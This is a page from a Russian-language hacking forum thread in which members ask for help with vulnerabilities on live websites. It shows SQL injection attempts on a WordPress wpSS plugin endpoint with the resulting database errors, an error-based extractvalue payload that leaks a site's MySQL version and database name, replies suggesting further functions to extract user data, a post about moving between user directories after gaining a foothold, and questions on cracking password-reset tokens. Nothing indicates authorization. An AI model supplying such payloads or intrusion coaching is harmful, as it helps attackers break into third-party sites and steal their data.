HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 92 из 296 « Первая < 4282 88 89 90 91 92 93 94 95 96 102142192 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #911  
Старый 17.12.2015, 01:01
sats
Новичок
Регистрация: 07.11.2006
Сообщений: 4
Провел на форуме:
29670

Репутация: 0
По умолчанию
Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (www.securityfocus.com/bid/28894/exploit), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]

SELECT * FROM wp_spreadsheet WHERE id='1'"'

WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]

INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('

', 'New', 'Blank spreadsheet');

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]

SELECT * FROM wp_spreadsheet WHERE id = 1'";

В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?
 
Ответить с цитированием

  #912  
Старый 17.12.2015, 11:30
OSW
Участник форума
Регистрация: 12.07.2007
Сообщений: 139
Провел на форуме:
623391

Репутация: 33
Отправить сообщение для OSW с помощью ICQ
По умолчанию
Цитата:
Сообщение от sats  
sats said:

Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (
www.securityfocus.com/bid/28894/exploit
), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)
WordPress database error
: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]
SELECT * FROM wp_spreadsheet WHERE id='1'"'
WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]
INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('
', 'New', 'Blank spreadsheet');
WordPress database error
: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]
SELECT * FROM wp_spreadsheet WHERE id = 1'";
В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?
Ну мб префикс базы не тот просто?
 
Ответить с цитированием

  #913  
Старый 18.12.2015, 01:43
sats
Новичок
Регистрация: 07.11.2006
Сообщений: 4
Провел на форуме:
29670

Репутация: 0
По умолчанию
в смысле префикс? table в скрипте жестко прописан. вопрос в том - возможно ли часть SQL операции отменить при ее атомарности.
 
Ответить с цитированием

  #914  
Старый 18.12.2015, 19:52
FireRidlle
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896

Репутация: 0
По умолчанию
может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.

?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'

когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.

ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist
 
Ответить с цитированием

  #915  
Старый 18.12.2015, 20:23
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию
Цитата:
Сообщение от FireRidlle  
FireRidlle said:

может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.
?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'
когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.
ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist
Похоже что WAF
 
Ответить с цитированием

  #916  
Старый 19.12.2015, 12:14
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию
Недавно залился на один ресурс и получил интересную ситуацию. Допустим в каталоге /var/www/user1/ существует папка tmp, на нее полные права (0777). Но как только пытаюсь достучаться с к этой папке с user2 получаю permission denied. Причем если выполнить file /var/www/user1/ выведет -- directory, но если file /var/www/user1/tmp -- permission denied. Даже на те файлы которых не существует получаю отказ. Как такое возможно? И есть ли способы с этим бороться?
 
Ответить с цитированием

  #917  
Старый 20.12.2015, 12:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
2015

Репутация: 5
По умолчанию
интересует такой вопрос: на сайте есть функция восстановления пароля, после запроса на новый пароль на почту приходит письмо с ссылкой вида site.com/resetpass/key/ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D исходников к сожалению нет. подскажите плс какова вероятность того что значение параметра key хранится в бд? на основании чего формируется ключ тоже не понятно.
 
Ответить с цитированием

  #918  
Старый 20.12.2015, 14:22
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от rumbln  
rumbln said:

интересует такой вопрос: на сайте есть функция восстановления пароля, после запроса на новый пароль на почту приходит письмо с ссылкой вида site.com/resetpass/key/ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D исходников к сожалению нет. подскажите плс какова вероятность того что значение параметра key хранится в бд? на основании чего формируется ключ тоже не понятно.
ключ всегда разный? это base64, посмотрите, разной ли он длинны, если сменить почту. вероятность есть, но самая простая реализация возможна и без этого
 
Ответить с цитированием

  #919  
Старый 20.12.2015, 14:23
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от FireRidlle  
FireRidlle said:

может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.
?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'
когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.
ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist
SCHEMA()?

SESSION_USER()

SYSTEM_USER()
 
Ответить с цитированием

  #920  
Старый 20.12.2015, 17:17
Unknown
Guest
Сообщений: n/a
Провел на форуме:
2015

Репутация: 5
По умолчанию
Цитата:
Сообщение от yarbabin  
yarbabin said:

ключ всегда разный? это base64, посмотрите, разной ли он длинны, если сменить почту. вероятность есть, но самая простая реализация возможна и без этого
Ключ разный если ввести другую почту и отличается при повторном запросе даже если почта та же самая (включая ip, браузер). тоже думал что base64 но ничего раскодировать так и не вышло.

три ключа (два - одно мыло, еще 1 - тестовый с другого):

wvB5ZVWZXhDGoI1XkcJBfHlAlMNg66awBEA0kNasXtyVW7Lmvt V8AawkESYDXivXomhAW9%2Fob4gL0JJkFF88DdFXISPFZP0nXV TIV2fJ0CNSy6K3PDiyoXie0hg5zmh1gmGwBPsZtUJLFym0gFzy YOQMIgeKIYqd517dapbJdko%3D

ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D

e89PzSq50NLMJm8w6tY9X5BjPY5hlg%2BwuYw0y8GghI3ynHtk bsUzwkSvmHZyyTgrdmtSk1shFTw2%2BgmPwHCcTBAnDyvC65yd ZyUvHcXM6R0YBnJ1ij2P07tvvpr%2BHLbDEDiKa3Gd1aySwyV4 Z2LPB1IPouKF56c53R75hDzXvNc%3D
 
Ответить с цитированием
Ответ
Страница 92 из 296 « Первая < 4282 88 89 90 91 92 93 94 95 96 102142192 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ